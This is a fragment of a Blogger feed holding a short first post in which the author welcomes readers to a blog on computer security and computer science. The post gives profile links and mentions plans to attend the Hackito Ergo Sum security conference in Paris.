<br /></div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-88389071784908892212010-04-03T20:16:00.009+02:002019-08-07T23:10:58.927+02:00My first post ...<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;">Welcome to my blog :)</span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;">Here I will post some articles on computer security and computer science in general. Some posts will be in english, others in french and maybe some in both languages.</span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;">Here some links about me :</span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;"><a class="vt-p" href="http://fr.linkedin.com/in/steevebarbeau"></a><a href="https://www.linkedin.com/in/steevebarbeau/">https://www.linkedin.com/in/steevebarbeau/</a></span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<a class="vt-p" href="http://twitter.com/steevebarbeau"><span class="Apple-style-span" style="font-family: inherit;">http://twitter.com/steevebarbeau</span></a></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;">In few weeks I'll assist to Hackito Ergo Sum, an IT security conference in Paris, so next posts will talk about this event that promise to be awesome.</span></div>
<div style="line-height: 1.6em; margin-bottom: 0.7em; margin-left: 0px; margin-right: 0px; margin-top: 0.7em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;">Thank you to read my blog.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
</div>
<div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0